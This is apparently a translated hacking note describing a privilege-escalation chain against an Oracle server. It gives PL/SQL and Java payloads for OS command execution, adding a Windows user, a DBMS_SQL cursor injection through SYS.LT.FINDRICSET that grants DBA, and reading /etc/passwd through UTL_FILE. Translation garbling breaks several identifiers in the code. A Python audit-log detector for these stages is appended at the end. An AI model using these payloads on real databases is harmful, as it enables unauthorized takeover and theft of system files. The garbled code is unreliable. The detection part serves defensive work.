Hacking Oracle cursor Injection

Source: Internet
Author: User
Tags: oracle cursor

Linx2008: this is a note from two years ago. The content has been deleted.

First, an evil method is used to connect to the oracle server... (process omitted)


Soon, I connected to the Oracle server and found that:
1. The DBA permission is not granted after the connection.
2. You cannot use SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to escalate permissions.
3. Running SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual shows that the Oracle server cannot connect to the network.


Fortunately, running the following:
Create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;

Successful! This user has the CREATE PROCEDURE permission.

Now I want to create a java extension and execute the command:

Create or replace and compile java source named "LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args) {try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(cmd.exe c (args ). getInputStream (); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str + = stemp + ""; myReader. close (); return str;} catch (Exception e) {return e. toString ();}}}


Begin dbms_java.grant_permission (PUBLIC, SYS: java. io. FilePermission, <all files>, execute); end;

Create or replace function LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. String) return String

Select * from all_objects where object_name like % LINX %
Grant all on LinxRunCMD to public
Select LinxRunCMD (cmd/c net user linx/add) from dual


But the first step gets stuck. The server cannot create Java extensions for some unknown reason!!
Fortunately, we also have the UTL library available to use:

Create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
  -- Handle for the file opened through the UTL_FILE_DIR directory object
  fHandler UTL_FILE.FILE_TYPE;
  buf varchar2(4000);
  output varchar2(8000);
BEGIN
  fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
  loop
    begin
      -- GET_LINE raises NO_DATA_FOUND at end of file, which ends the loop
      UTL_FILE.GET_LINE(fHandler, buf);
      DBMS_OUTPUT.PUT_LINE('Cursor: ' || buf);
    exception
      when no_data_found then exit;
    end;
    output := output || buf || chr(10);
  end loop;
  UTL_FILE.FCLOSE(fHandler);
  return output;
END;


The UTL_FILE_DIR directory object must be created first:

Create or replace directory UTL_FILE_DIR AS '/etc';

This specifies a directory. However, running it failed for lack of permission. I had to find a way to escalate privileges.


***************

I wrote N PDF files to introduce this technique. I simplified the code:


DECLARE
Skype NUMBER;
BEGIN
PY: = DBMS_ SQL .OPEN_CURSOR;
DBMS_ SQL .PARSE (ACC, declare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user; commit; end;, 0 );
DBMS_OUTPUT.PUT_LINE (Cursor: | metrics );
Begin sys. LT. FINDRICSET (. | dbms_ SQL .execute (| YY |) --, x); END;
Raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE (Cursor: | ACC );
When others then DBMS_OUTPUT.PUT_LINE (Cursor: | ACC );
END;


After running the command, reconnect to the database and you will have the DBA permission...


Now you can read the file:


Create or replace directory UTL_FILE_DIR AS '/etc';
Select LinxUTLReadfile('passwd') from dual


It's easy to follow.
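
Each stage of this chain leaves recognizable SQL in an audit trail, so a defender can triage audited statements by database user. The sketch below is an added example, not part of the original note; the rule names, the sample records and the account names APPUSER, NEWDBA and REPORTS are constructed for illustration.

```python
import re

# One rule per stage of the chain in the note, matched against audited SQL text.
# Rule names are this example's own labels, not Oracle terminology.
RULES = [
    ("dynamic-sql-wrapper",
     r"create\s+(or\s+replace\s+)?function\b.*authid\s+current_user.*execute\s+immediate"),
    ("java-source-create", r"create\s+(or\s+replace\s+)?(and\s+compile\s+)?java\s+source"),
    ("java-permission-grant", r"dbms_java\s*\.\s*grant_permission"),
    ("outbound-http", r"utl_http\s*\.\s*request"),
    ("directory-create", r"create\s+(or\s+replace\s+)?directory\b"),
    ("cursor-autonomous-grant",
     r"dbms_sql\s*\.\s*parse\b.*pragma\s+autonomous_transaction"),
    ("dba-grant", r"grant\s+dba\s+to\b"),
]
COMPILED = [(name, re.compile(p, re.I | re.S)) for name, p in RULES]

def classify(sql):
    """Return the names of every rule that matches one SQL statement."""
    return [name for name, rx in COMPILED if rx.search(sql)]

def triage(records, admins=frozenset({"SYS", "SYSTEM"})):
    """Group findings by database user, skipping accounts listed in admins."""
    findings = {}
    for user, sql in records:
        if user.upper() in admins:
            continue
        for hit in classify(sql):
            findings.setdefault(user, set()).add(hit)
    return findings

# Constructed audit records (user, SQL text); not taken from a real system.
SAMPLE = [
    ("APPUSER", "select utl_http.request('http://example.invalid/') from dual"),
    ("APPUSER", "create or replace function q(p varchar2) return number "
                "authid current_user is begin execute immediate p; return 1; end;"),
    ("APPUSER", "create or replace directory UTL_FILE_DIR as '/etc'"),
    ("APPUSER", "declare c number; begin c := dbms_sql.open_cursor; "
                "dbms_sql.parse(c, 'declare pragma autonomous_transaction; begin "
                "execute immediate ''grant dba to APPUSER''; commit; end;', 0); end;"),
    ("SYSTEM", "grant dba to NEWDBA"),
    ("REPORTS", "select count(*) from orders"),
]

if __name__ == "__main__":
    for user, hits in triage(SAMPLE).items():
        print(user, sorted(hits))
```

A low-privileged account that trips several of these rules in one session, as APPUSER does here, is the pattern to escalate; a single hit such as a directory creation by a deployment account is usually routine.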
 
